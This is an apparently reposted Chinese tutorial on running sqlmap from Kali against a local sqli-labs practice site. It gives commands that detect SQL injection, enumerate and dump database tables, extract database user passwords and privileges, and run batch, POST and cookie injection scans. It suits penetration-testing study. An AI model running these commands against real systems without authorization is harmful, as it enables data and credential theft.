kali——sqlmap的使用

2024-08-30 01:44
文章标签 使用 kali sqlmap

本文主要是介绍kali——sqlmap的使用,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

目录

前言

sqlmap在kali中的使用

检测注入点

产看所有数据库

查看当前网站使用的数据库

产看数据表

查看字段

查看字段数据

查看数据库用户

查看所有用户

获取数据库用户密码

查看用户权限

判断当前数据库用户是否是管理员

批量自动化扫描

post请求注入

cookie注入



前言

sqlmap是一款强大的开源自动化SQL注入工具,主要用于检测和利用SQL注入漏洞,协助渗透测试人员快速发现和验证web应用程序中的SQL注入缺陷。

实际渗透测试中,只要kali机能够上网就可以直接使用sqlmap;这里我们在centos上搭建sqlibs靶场做靶机,kali机为攻击机。

然后将kali机的dns为服务机centos的dns,这样kali机就可以访问centos上的网站了。


sqlmap在kali中的使用

检测注入点

sqlmap -u 完整url             //检测过程中需要手动输入y/n,即是否继续进行sql注入检测
sqlmap -u 完整url --batch     //检测过程中默认继续进行sql注入检测

sqlmap -u http://www.sqlibs.com/Less-1/?id=1 --batch

可以看到一共扫到了四种类型的sql注入漏洞,以及漏洞使用方法:


产看所有数据库

sqlmap -u 完整url --dbs

sqlmap -u  http://www.sqlibs.com/Less-1/?id=1 --dbs


查看当前网站使用的数据库

sqlmap -u 完整url --current-db

sqlmap -u  http://www.sqlibs.com/Less-1/?id=1 --current-db

可以看到使用的数据库是security


产看数据表

sqlmap -u 完整url -D '数据库名' --tables

sqlmap -u http://www.sqlibs.com/Less-1/?id=1 -D 'security' --tables

可以看到数据库security有四张表:emails、referers、uagents、users


查看字段

sqlmap -u 完整url -D '数据库名' -T '表名' --columns

sqlmap -u http://www.sqlibs.com/Less-1/?id=1 -D 'security' -T 'users' --columns

可以看到users表有三个字段:id、password、username


查看字段数据

sqlmap -u 完整url -D '数据库名' -T '表名' --dump

sqlmap -u http://www.sqlibs.com/Less-1/?id=1 -D 'security' -T 'users' --dump

可以看到users表的三个字段及其数据


查看数据库用户

sqlmap -u 完整url --current-user

sqlmap -u http://www.sqlibs.com/Less-1/?id=1 --current-user


查看所有用户

sqlmap -u 完整url --users

sqlmap -u http://www.sqlibs.com/Less-1/?id=1 --users


获取数据库用户密码

sqlmap -u 完整url --passwords

sqlmap -u http://www.sqlibs.com/Less-1/?id=1 --passwords


查看用户权限

sqlmap -u 完整url --privileges

sqlmap -u http://www.sqlibs.com/Less-1/?id=1 --privileges


判断当前数据库用户是否是管理员

sqlmap -u 完整url --is-dba

sqlmap -u http://www.sqlibs.com/Less-1/?id=1 --is-dba

判断结果为True,即当前数据库用户是管理员用户。


批量自动化扫描

新建xxx.txt文件,里面存放多个url

sqlmap -m xxx.txt

post请求注入

将抓包抓到的http请求内容存放到.txt文件中

sqlmap -r xxx.txt

cookie注入

sqlmap -u 完整curl --cookie 'cookie'(单引号和双引号都行)


这篇关于kali——sqlmap的使用的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/1119444

相关文章

Java String字符串的常用使用方法

《JavaString字符串的常用使用方法》String是JDK提供的一个类,是引用类型,并不是基本的数据类型,String用于字符串操作,在之前学习c语言的时候,对于一些字符串,会初始化字符数组表... 目录一、什么是String二、如何定义一个String1. 用双引号定义2. 通过构造函数定义三、St

Pydantic中Optional 和Union类型的使用

《Pydantic中Optional和Union类型的使用》本文主要介绍了Pydantic中Optional和Union类型的使用,这两者在处理可选字段和多类型字段时尤为重要,文中通过示例代码介绍的... 目录简介Optional 类型Union 类型Optional 和 Union 的组合总结简介Pyd

Vue3使用router,params传参为空问题

《Vue3使用router,params传参为空问题》:本文主要介绍Vue3使用router,params传参为空问题,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地方,望不吝赐... 目录vue3使用China编程router,params传参为空1.使用query方式传参2.使用 Histo

使用Python自建轻量级的HTTP调试工具

《使用Python自建轻量级的HTTP调试工具》这篇文章主要为大家详细介绍了如何使用Python自建一个轻量级的HTTP调试工具,文中的示例代码讲解详细,感兴趣的小伙伴可以参考一下... 目录一、为什么需要自建工具二、核心功能设计三、技术选型四、分步实现五、进阶优化技巧六、使用示例七、性能对比八、扩展方向建

使用Python实现一键隐藏屏幕并锁定输入

《使用Python实现一键隐藏屏幕并锁定输入》本文主要介绍了使用Python编写一个一键隐藏屏幕并锁定输入的黑科技程序,能够在指定热键触发后立即遮挡屏幕,并禁止一切键盘鼠标输入,这样就再也不用担心自己... 目录1. 概述2. 功能亮点3.代码实现4.使用方法5. 展示效果6. 代码优化与拓展7. 总结1.

使用Python开发一个简单的本地图片服务器

《使用Python开发一个简单的本地图片服务器》本文介绍了如何结合wxPython构建的图形用户界面GUI和Python内建的Web服务器功能,在本地网络中搭建一个私人的,即开即用的网页相册,文中的示... 目录项目目标核心技术栈代码深度解析完整代码工作流程主要功能与优势潜在改进与思考运行结果总结你是否曾经

Linux中的计划任务(crontab)使用方式

《Linux中的计划任务(crontab)使用方式》:本文主要介绍Linux中的计划任务(crontab)使用方式,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地方,望不吝赐教... 目录一、前言1、linux的起源与发展2、什么是计划任务(crontab)二、crontab基础1、cro

kotlin中const 和val的区别及使用场景分析

《kotlin中const和val的区别及使用场景分析》在Kotlin中,const和val都是用来声明常量的,但它们的使用场景和功能有所不同,下面给大家介绍kotlin中const和val的区别,... 目录kotlin中const 和val的区别1. val:2. const:二 代码示例1 Java

C++变换迭代器使用方法小结

《C++变换迭代器使用方法小结》本文主要介绍了C++变换迭代器使用方法小结,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧... 目录1、源码2、代码解析代码解析:transform_iterator1. transform_iterat

C++中std::distance使用方法示例

《C++中std::distance使用方法示例》std::distance是C++标准库中的一个函数,用于计算两个迭代器之间的距离,本文主要介绍了C++中std::distance使用方法示例,具... 目录语法使用方式解释示例输出:其他说明:总结std::distance&n编程bsp;是 C++ 标准